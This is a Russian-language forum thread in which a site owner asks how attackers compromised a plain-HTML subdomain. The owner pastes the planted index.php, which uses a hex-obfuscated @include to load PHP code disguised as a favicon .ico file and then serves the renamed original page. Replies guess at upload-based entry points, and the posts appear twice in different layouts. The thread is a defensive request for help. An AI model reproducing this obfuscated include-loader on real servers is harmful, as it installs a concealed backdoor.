Взлом сайта на PHP

@yotobo · Регистрация: 28.09.2013

Студворк — интернет-сервис помощи студентам

Здравствуйте! Нужна помощь в странной ситуации. На основном домене стоит CMS последней версии и уязвимостей вроде не найдено. Но злоумышленники проникают каким-то образом на поддомен, который находится в другой папке на хостинге.
Там нет не то что CMS нет даже php. Там HTML сайт.
В каждой папке появился index.php а имеющийся index.html заменили на index.html.bak.bak
Код встроенного в сайт index.php

PHP

<?php
/*33a97*/
 
@include "\x2fhome\x2fuser\x73/s/s\x65rgx/\x64omai\x6es/si\x74es.s\x79berm\x65dia.\x72u/73\x33/dis\x74r/fa\x76icon\x5f314c\x387.ic\x6f";
 
/*33a97*/
 
 
echo file_get_contents('index.html.bak.bak');

В разных папках код отличается.
Пароли на хостинг-панель,FTP и MySQL стоят сложнейшие 12-15 символов в разном регистре со спецсимволами. Брутфорс отпадает сразу. Изначально права на файлы и папки стояли 744. После атаки они все поменялись на 755. Каким образом не пойму???
Хостер пока ничего не объясняет толком. Все списывает на уязвимость в CMS. Хотя причем CMS и поддомен в другой папке на хостинге?
Кто-нибудь сталкивался с таким чудом? И если да, то как бороться?

@ИмяПользователя · 31.10.2017, 22:32

Вариантов может быть масса, первый пришедший в голову: когда в "чистом html" реализована загрузка файла на сервер без должной проверки содержания/пути загрузки. Злоумышленник может банально вместо "картинки для аватара" загрузить собственный сценарий, после чего запустить его из браузера.

@yotobo · 31.10.2017, 23:18 **[ТС]**

Не знаю как насчет загрузки файлов на сервер без php обработчика формы. Но на поддомене находится сайт без каких либо форм. Обычный HTML текст с картинками и менюшкой. Всё! Там невозможно что либо загрузить через сам сайт.

@timen · 01.11.2017, 12:12

Сообщение от yotobo

Не знаю как насчет загрузки файлов на сервер без php обработчика формы. Но на поддомене находится сайт без каких либо форм. Обычный HTML текст с картинками и менюшкой. Всё! Там невозможно что либо загрузить через сам сайт.

Если например там можно писать комментарии, это тоже вариант загрузки.

@ИмяПользователя 29 / 26 / 18 Регистрация: 02.04.2015 Сообщений: 304
	31.10.2017, 22:32	2
	Вариантов может быть масса, первый пришедший в голову: когда в "чистом html" реализована загрузка файла на сервер без должной проверки содержания/пути загрузки. Злоумышленник может банально вместо "картинки для аватара" загрузить собственный сценарий, после чего запустить его из браузера. 0

@yotobo 0 / 0 / 1 Регистрация: 28.09.2013 Сообщений: 42
	31.10.2017, 23:18 [ТС]	3
	Не знаю как насчет загрузки файлов на сервер без php обработчика формы. Но на поддомене находится сайт без каких либо форм. Обычный HTML текст с картинками и менюшкой. Всё! Там невозможно что либо загрузить через сам сайт. 0

@timen 74 / 29 / 4 Регистрация: 16.10.2017 Сообщений: 95
	01.11.2017, 12:12	4
	Сообщение от yotobo Не знаю как насчет загрузки файлов на сервер без php обработчика формы. Но на поддомене находится сайт без каких либо форм. Обычный HTML текст с картинками и менюшкой. Всё! Там невозможно что либо загрузить через сам сайт. Если например там можно писать комментарии, это тоже вариант загрузки. 0

Опции темы